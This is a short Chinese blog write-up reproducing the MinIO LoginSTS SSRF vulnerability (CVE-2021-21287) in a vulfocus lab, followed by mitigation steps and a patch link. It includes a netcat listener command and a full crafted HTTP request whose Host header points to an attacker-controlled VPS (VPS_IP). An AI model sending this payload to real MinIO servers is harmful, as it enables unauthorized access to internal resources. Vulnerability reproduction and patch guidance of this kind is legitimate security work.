Minio未授权SSRF漏洞(CVE-2021-21287)
漏洞描述
MinIO 是一款基于Go语言发开的高性能、分布式的对象存储系统。客户端支持Java,Net,Python,Javacript, Golang语言。
由于MinIO组件中LoginSTS接口设计不当,导致存在服务器端请求伪造漏洞。
攻击者可以通过构造URL来发起服务器端请求伪造攻击成功利用此漏洞的攻击者能够通过利用服务器上的功能来读取、更新内部资源或执行任意命令。
影响版本
MinIO<RELEASE.2021-01-30T00-20-58Z
漏洞复现
1、靶场环境使用vulfocus的在线环境。
2、在vps上开启监听,nc -lvp 5555
3、使用bp抓取登录数据包,修改登录数据包
payload数据包:
POST /minio/webrpc HTTP/1.1
Host: VPS_IP:5555
Content-Length: 79
x-amz-date: 20221213T025119Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://123.58.224.8:32602
Referer: http://123.58.224.8:32602/minio/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"id":1,"jsonrpc":"2.0","params":{"token": "test"},"method":"web.LoginSTS"}
漏洞修复
1、配置环境变量“ MINIO_BROWSER = off”
2、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://github.com/minio/minio/releases/tag/RELEASE.2021-01-30T00-20-58Z
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效